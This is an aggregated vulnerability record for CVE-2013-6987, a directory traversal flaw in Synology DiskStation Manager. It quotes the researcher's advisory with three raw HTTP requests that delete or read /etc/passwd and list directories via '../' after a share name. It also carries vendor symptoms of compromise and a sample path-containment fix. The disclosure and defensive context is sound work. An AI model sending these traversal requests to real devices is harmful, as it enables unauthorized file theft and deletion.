ID

VAR-201312-0278


CVE

CVE-2013-6987


TITLE

Directory traversal vulnerability in the FileBrowser components of Synology DiskStation Manager

Trust: 0.8

sources: JVNDB: JVNDB-2013-005755

DESCRIPTION

Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/.

The FileBrowser component of Synology DiskStation Manager (DSM) contains a directory traversal vulnerability. A third party may read, write, and delete arbitrary files via parameters under webapi/FileStation/ that contain .. (dot dot).

Synology DiskStation Manager is prone to multiple directory-traversal vulnerabilities. Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to bypass security restrictions and perform unauthorized actions on system and configuration files in the context of the application. Synology DiskStation Manager 4.3-3810 and prior are vulnerable.

The operating system can manage data, documents, photos, music and other information. The vulnerability is caused by: (1) the file_delete.cgi script not filtering the 'path' parameter correctly; (2) the file_share.cgi script in the webapi/FileStation/ directory not filtering the 'folder_path' parameter correctly; (3) the fbdownload/ directory not filtering the 'dlink' parameter correctly; (4) the html5_upload.cgi, file_download.cgi, file_sharing.cgi, file_MVCP.cgi and file_rename.cgi scripts not filtering parameters properly.

**************************************************************
Title: Synology DSM multiple directory traversal
Version affected: <= 4.3-3810
Vendor: Synology
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: patched
CVE: 2013-6987
**************************************************************

I'm again here with a Synology DSM vulnerability.

Synology DiskStation Manager (DSM) is a Linux-based operating system, used for the DiskStation and RackStation products.

This kind of vulnerability allows any authenticated user, even if not administrative, to access, create, delete, modify system and configuration files.

The only countermeasure implemented against this vulnerability is the check that the path starts with a valid shared folder, so it is enough to put the "../" straight after it to bypass the security check.

Vulnerable CGIs:
- /webapi/FileStation/html5_upload.cgi
- /webapi/FileStation/file_delete.cgi
- /webapi/FileStation/file_download.cgi
- /webapi/FileStation/file_sharing.cgi
- /webapi/FileStation/file_share.cgi
- /webapi/FileStation/file_MVCP.cgi
- /webapi/FileStation/file_rename.cgi

I have not tested all the CGIs, but I guess that many others are vulnerable, so don't take my list as comprehensive.

Following are some examples ("test" is a valid folder name):

- Delete /etc/passwd
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
===========================================

- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================

2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd

- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2

folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
==========================

Timeline:
- 05/12/2013: First contact with the vendor
- 06/12/2013: Vulnerability details sent to the vendor
- 20/12/2013: Patch released by the vendor

http://www.synology.com/en-global/company/news/article/437

February 14, 2014 - Synology® confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly.

The following are possible symptoms that may appear on affected DiskStation and RackStation:
- Exceptionally high CPU usage detected in Resource Monitor: CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their names
- Appearance of non-Synology folder: An automatically created shared folder with the name “startup”, or a non-Synology folder appearing under the path of “/root/PWNED”
- Redirection of the Web Station: “Index.php” is redirected to an unexpected page
- Appearance of non-Synology CGI program: Files with meaningless names exist under the path of “/usr/syno/synoman”
- Appearance of non-Synology script file: Non-Synology script files, such as “S99p.sh”, appear under the path of “/usr/syno/etc/rc.d”

If users identify any of the above situations, they are strongly encouraged to do the following:
- For DiskStation or RackStation running on DSM 4.3, please follow the instruction here (http://www.synology.com/en-global/support/faq/348) to REINSTALL DSM 4.3-3827.
- For DiskStation or RackStation running on DSM 4.0, it’s recommended to REINSTALL DSM 4.0-2259 or onward from Synology Download Center.
- For DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it’s recommended to REINSTALL DSM 4.2-3243 or onward from Synology Download Center (http://www.synology.com/en-global/support/download).

Confidentiality Impact: Complete (There is total information disclosure, resulting in all system files being revealed.)
Integrity Impact: Complete (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.)
Availability Impact: Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit.)
Authentication: Not required (Authentication is not required to exploit the vulnerability.)
Gained Access: None
Vulnerability Type(s): Execute Code

This is also known as the /PWNED or /lolz hack
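
The check described in the advisory (only the leading shared-folder name is validated) next to a containment check made after normalisation, covering both the plain path parameters and the hex-encoded dlink value. This is an added example, not Synology's code and not part of the advisory; the SHARES mapping, the /volume1 location and all function names are hypothetical.

```python
import posixpath

# Hypothetical share layout for this example: shared folder name -> directory on disk.
SHARES = {"test": "/volume1/test"}


def naive_check(path):
    """Flawed check as described in the advisory: only the first component is validated."""
    parts = path.split("/")
    return len(parts) > 1 and parts[0] == "" and parts[1] in SHARES


def resolve_in_share(path):
    """Map a request path to a location on disk; raise ValueError if it leaves the share."""
    if "\x00" in path or not path.startswith("/"):
        raise ValueError("malformed path")
    share, _, rest = path[1:].partition("/")
    if share not in SHARES:
        raise ValueError("unknown shared folder")
    root = SHARES[share]
    # Collapse "." and ".." first, then require the result to stay at or below root.
    # normpath is lexical only; on a real filesystem resolve symlinks as well
    # (os.path.realpath) before making this comparison.
    full = posixpath.normpath(posixpath.join(root, rest.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        raise ValueError("path escapes shared folder")
    return full


def resolve_dlink(dlink_hex):
    """Decode a hex-encoded dlink value, then apply the same containment check."""
    try:
        path = bytes.fromhex(dlink_hex).decode("utf-8")
    except ValueError as exc:  # covers bad hex and invalid UTF-8
        raise ValueError("malformed dlink") from exc
    return resolve_in_share(path)
```

The comparison uses `root + "/"` rather than a bare prefix so that a sibling directory such as /volume1/test2 is not accepted as being inside /volume1/test.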

Trust: 2.25

sources: NVD: CVE-2013-6987 // JVNDB: JVNDB-2013-005755 // BID: 64483 // VULHUB: VHN-66989 // VULMON: CVE-2013-6987 // PACKETSTORM: 124563 // PACKETSTORM: 125864

AFFECTED PRODUCTS

vendor: synology, model: diskstation manager, scope: eq, version: 4.3-3810

Trust: 1.9

vendor: synology, model: diskstation manager, scope: lt, version: 4.3-3810 update 3

Trust: 0.8

vendor: synology, model: diskstation manager, scope: eq, version: 4.3

Trust: 0.3

sources: BID: 64483 // JVNDB: JVNDB-2013-005755 // CNNVD: CNNVD-201312-538 // NVD: CVE-2013-6987

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-6987
value: HIGH

Trust: 1.0

NVD: CVE-2013-6987
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201312-538
value: HIGH

Trust: 0.6

VULHUB: VHN-66989
value: HIGH

Trust: 0.1

VULMON: CVE-2013-6987
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2013-6987
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-66989
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-66989 // VULMON: CVE-2013-6987 // JVNDB: JVNDB-2013-005755 // CNNVD: CNNVD-201312-538 // NVD: CVE-2013-6987

PROBLEMTYPE DATA

problemtype:CWE-22

Trust: 1.9

sources: VULHUB: VHN-66989 // JVNDB: JVNDB-2013-005755 // NVD: CVE-2013-6987

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 125864 // CNNVD: CNNVD-201312-538

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201312-538

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-005755

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-66989 // VULMON: CVE-2013-6987

PATCH

title: DS114 Release Notes, url: http://www.synology.com/en-us/releaseNote/model/DS114

Trust: 0.8

title: - url:https://github.com/khulnasoft-labs/awesome-security

Trust: 0.1

sources: VULMON: CVE-2013-6987 // JVNDB: JVNDB-2013-005755

EXTERNAL IDS

db: NVD, id: CVE-2013-6987

Trust: 3.1

db: BID, id: 64483

Trust: 2.1

db: PACKETSTORM, id: 124563

Trust: 1.9

db: EXPLOIT-DB, id: 30475

Trust: 1.8

db: JVNDB, id: JVNDB-2013-005755

Trust: 0.8

db: CNNVD, id: CNNVD-201312-538

Trust: 0.7

db: FULLDISC, id: 20131220 SYNOLOGY DSM MULTIPLE DIRECTORY TRAVERSAL

Trust: 0.6

db: XF, id: 89892

Trust: 0.6

db: XF, id: 20136987

Trust: 0.6

db: SEEBUG, id: SSVID-83858

Trust: 0.1

db: VULHUB, id: VHN-66989

Trust: 0.1

db: VULMON, id: CVE-2013-6987

Trust: 0.1

db: PACKETSTORM, id: 125864

Trust: 0.1

sources: VULHUB: VHN-66989 // VULMON: CVE-2013-6987 // BID: 64483 // JVNDB: JVNDB-2013-005755 // PACKETSTORM: 124563 // PACKETSTORM: 125864 // CNNVD: CNNVD-201312-538 // NVD: CVE-2013-6987

REFERENCES

url:http://seclists.org/fulldisclosure/2013/dec/177

Trust: 2.1

url:http://www.securityfocus.com/bid/64483

Trust: 1.8

url:http://www.synology.com/en-us/releasenote/model/ds114

Trust: 1.8

url:http://www.exploit-db.com/exploits/30475

Trust: 1.8

url:http://packetstormsecurity.com/files/124563

Trust: 1.8

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/89892

Trust: 1.2

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6987

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6987

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/89892

Trust: 0.6

url:http://www.synology.com/dsm/index.php?lang=us

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2013-6987

Trust: 0.2

url:https://cwe.mitre.org/data/definitions/22.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.exploit-db.com/exploits/30475/

Trust: 0.1

url:http://www.andreafabrizi.it

Trust: 0.1

url:http://www.synology.com/en-global/company/news/article/437

Trust: 0.1

url:http://www.synology.com/en-global/support/faq/348

Trust: 0.1

url:http://www.synology.com/en-global/support/download

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-6955

Trust: 0.1

sources: VULHUB: VHN-66989 // VULMON: CVE-2013-6987 // BID: 64483 // JVNDB: JVNDB-2013-005755 // PACKETSTORM: 124563 // PACKETSTORM: 125864 // CNNVD: CNNVD-201312-538 // NVD: CVE-2013-6987

CREDITS

Andrea Fabrizi

Trust: 1.0

sources: BID: 64483 // PACKETSTORM: 124563 // CNNVD: CNNVD-201312-538

SOURCES

db: VULHUB, id: VHN-66989
db: VULMON, id: CVE-2013-6987
db: BID, id: 64483
db: JVNDB, id: JVNDB-2013-005755
db: PACKETSTORM, id: 124563
db: PACKETSTORM, id: 125864
db: CNNVD, id: CNNVD-201312-538
db: NVD, id: CVE-2013-6987

LAST UPDATE DATE

2024-11-23T21:55:28.945000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-66989, date: 2017-08-29T00:00:00
db: VULMON, id: CVE-2013-6987, date: 2017-08-29T00:00:00
db: BID, id: 64483, date: 2013-12-20T00:00:00
db: JVNDB, id: JVNDB-2013-005755, date: 2014-01-07T00:00:00
db: CNNVD, id: CNNVD-201312-538, date: 2014-01-02T00:00:00
db: NVD, id: CVE-2013-6987, date: 2024-11-21T02:00:06.723

SOURCES RELEASE DATE

db: VULHUB, id: VHN-66989, date: 2013-12-31T00:00:00
db: VULMON, id: CVE-2013-6987, date: 2013-12-31T00:00:00
db: BID, id: 64483, date: 2013-12-20T00:00:00
db: JVNDB, id: JVNDB-2013-005755, date: 2014-01-07T00:00:00
db: PACKETSTORM, id: 124563, date: 2013-12-23T15:25:15
db: PACKETSTORM, id: 125864, date: 2014-03-25T23:12:57
db: CNNVD, id: CNNVD-201312-538, date: 2013-12-27T00:00:00
db: NVD, id: CVE-2013-6987, date: 2013-12-31T16:04:23.790